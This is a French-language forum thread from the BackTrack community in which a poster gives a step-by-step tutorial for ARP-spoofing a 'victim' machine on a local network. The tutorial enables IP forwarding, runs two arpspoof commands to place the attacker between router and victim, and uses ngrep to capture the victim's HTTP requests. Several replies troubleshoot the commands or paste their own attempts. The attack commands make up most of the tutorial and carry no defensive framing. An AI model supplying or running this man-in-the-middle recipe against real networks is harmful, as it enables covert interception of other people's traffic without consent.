Remote Exploit Forums

Go Back   Remote Exploit Forums > International Communities > BackTrack French Community > Tutoriaux et howtos


   

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 06-27-2009, 02:00 PM
HKdone
Guest
 
Posts: n/a
Exclamation [sniffing] local network...

bonjour,
tous dabort ce que nous devons savoir pour y arriver.

Notre passerelle/router ADSL est 192.168.0.1 (peut être aussi 192.168.1.1).

Notre machine victime est 192.168.0.84

Notre machine sniffeuse est 192.168.0.56

Ensuite il faut activer le forwarding Ipv4.

Code:
echo 1 >  /proc/sys/net/ipv4/ip_forward
ou
Code:
sysctl -w net.ipv4.ip_forward
(la premiere fonctionne trés bien sous backtrack, la seconde je ne sais pas.)

Ensuite il faut ouvrir plusieurs consoles.

la premiere pour faire croire à 192.168.0.1 que nous possedons l'interface de 192.168.0.84

Code:
arpspoof -i eth0 -t 192.168.0.1 192.168.0.84
la seconde pour faire croire à 192.168.0.84 que nous sommes 192.168.0.1

Code:
arpspoof -i eth0 -t 192.168.0.84 192.168.0.1
La troisième pour écouter le traffic contenant la chaine "GET /shearch" avec ngerp :

Code:
ngrep "GET /shearch" "host 192.168.0.84"
le résulta vous affichera la bonne marche des choses.

NOTEZ que arpspoof est ici utilisé avec l'option -t, cela vise une seule machine (donc 192.168.0.84), sans cette option toutes les machines sont visées.

NOTEZ également que ce que nous venons de faire avec arpspoof et ngrep peut être fait en une seule commande avec ettercap qui est certe moins polyvalente.

Cet article est pris dans un magazine appellé "LINUX-Hors série" que je vous conseille.

Voila je vous remerçi de me poster le résultat de vos test de ce tutorial...
par avance merci

Last edited by HKdone; 06-30-2009 at 05:49 AM.
Reply With Quote
  #2 (permalink)  
Old 06-29-2009, 05:45 PM
Junior Member
 
Join Date: Jun 2009
Posts: 6
Default Pb sur ce tuto

Salut HKdone,

Sa m'as l'air d'etre un bon tuto ton post, mais moi j'ai un petit souci avec la 2eme command : # arpspoof -i ath0 192.168.1.1 192.168.1.2 (avec les IPs et interface de mon reseau) et j'obtiens sa :
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host

je rajoute donc l'option -t avant IP du routeur et là j'ai cette reponse :
arpspoof: couldn't arp for host 192.168.1.1

Je me pose donc des questions. Avec ettercap-gui, sa marche sans probleme.

A titre d'info j'utilise bt3f sur Eeepc-900.
Mon reseau :
Routeur :192.168.1.1
Victime :192.168.1.2
Sniff : 192.168.1.3

Jvais continuer de chercher, pour voir ce qui foire.
Reply With Quote
  #3 (permalink)  
Old 06-30-2009, 05:50 AM
HKdone
Guest
 
Posts: n/a
Default

bonjour
dsl j'avais oublier un -t l'erreur est réparée
je croi aussi que tu doit metre eth0 et non ath0...
voila.
=)

Last edited by HKdone; 06-30-2009 at 05:52 AM.
Reply With Quote
  #4 (permalink)  
Old 07-23-2009, 07:24 PM
Junior Member
 
Join Date: Jul 2009
Posts: 11
Default

Cela ressemble plus être un tuto man in the middle, non ?
De plus, il doit y avoir des outils plus sympa pour le sniff de la fin, non ?
Reply With Quote
  #5 (permalink)  
Old 09-01-2009, 08:43 PM
Junior Member
 
Join Date: Sep 2008
Posts: 9
Default

Merci du tuyau
__________________
A la santé de Sanguinarius, qui a le cul aussi plombé que la sécurité de ce forum.
Reply With Quote
  #6 (permalink)  
Old 01-25-2010, 10:10 PM
Just burned his ISO
 
Join Date: Jan 2010
Posts: 3
Send a message via MSN to claud3646
Default

Moi il y a 2 problème le premier ma victime n'a plus accès a internet et le deuxième est que quand je lance ngrep il se lance automatiquement sur eth0 mais moi mon interface est wlan0. j'ai chercher en lisant le manuel mais il ne dise pas comment changer l'interface
Reply With Quote
  #7 (permalink)  
Old 01-26-2010, 12:21 AM
yop fr's Avatar
Moderator
 
Join Date: Jan 2008
Location: France
Posts: 245
Default

Quote:
Originally Posted by claud3646 View Post
ngrep il se lance automatiquement sur eth0 mais moi mon interface est wlan0. j'ai chercher en lisant le manuel mais il ne dise pas comment changer l'interface
bein prend tcpdump ou tshark etc...
Reply With Quote
  #8 (permalink)  
Old 02-05-2010, 10:46 AM
New Member
 
Join Date: Feb 2010
Location: France
Posts: 4
Send a message via ICQ to Irrintzina Send a message via Skype™ to Irrintzina
Default

Oui, ça ressemble à "man in the middle", mais la victime n'a plus sa connection... Je m'intéresse à ce tuto car je n'aime pas utiliser une application sans comprendre. Mais oui, certaines applications permettent d'arriver au même point sans inconvénients.
Reply With Quote
  #9 (permalink)  
Old 02-25-2010, 11:31 AM
Just burned his ISO
 
Join Date: Feb 2010
Posts: 2
Default

Bonjour,

pour moi ca ne fonctionne pas je ne reçois aucune information de l'ip victime.

Voici ma démarche:

Ip victime: 192.168.1.10
Ip du sniff : 192.168.1.12
Ip passerelle: 192.168.1.1

Console1:

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.10

Console2:

root@bt:~# arpspoof -i wlan0 -t 192.168.0.10 192.168.1.1

Console3:

root@bt:~# ngrep "GET /shearch" "host 192.168.1.10"

voila ce que ca m'affiche:

wmaster0: noIPv4 adress assigned: cannot assign requested address
interface: wmaster0
filterip or ip6) and (host 192.168.1.10)
match: GET/shearch
##############################################
##############################################
############....

Je génère un peu de traffic de l'ip victime

au bout d'un moment je fais ctrl+c

puis j'ai: 6844received, 0dropped

désolé je suis débutant j'essaie de comprendre.
Reply With Quote
  #10 (permalink)  
Old 02-25-2010, 05:31 PM
Nagual's Avatar
Moderator
 
Join Date: Nov 2007
Location: Desert of S3th
Posts: 253
Default

c'est quoi ça ?


Code:
root@bt:~# ngrep "GET /shearch" "host 192.168.1.10"
__________________
http://backtrack-fr.net

Reply With Quote
Reply

Bookmarks

Tags
[howto sniffing"

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 03:29 PM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.2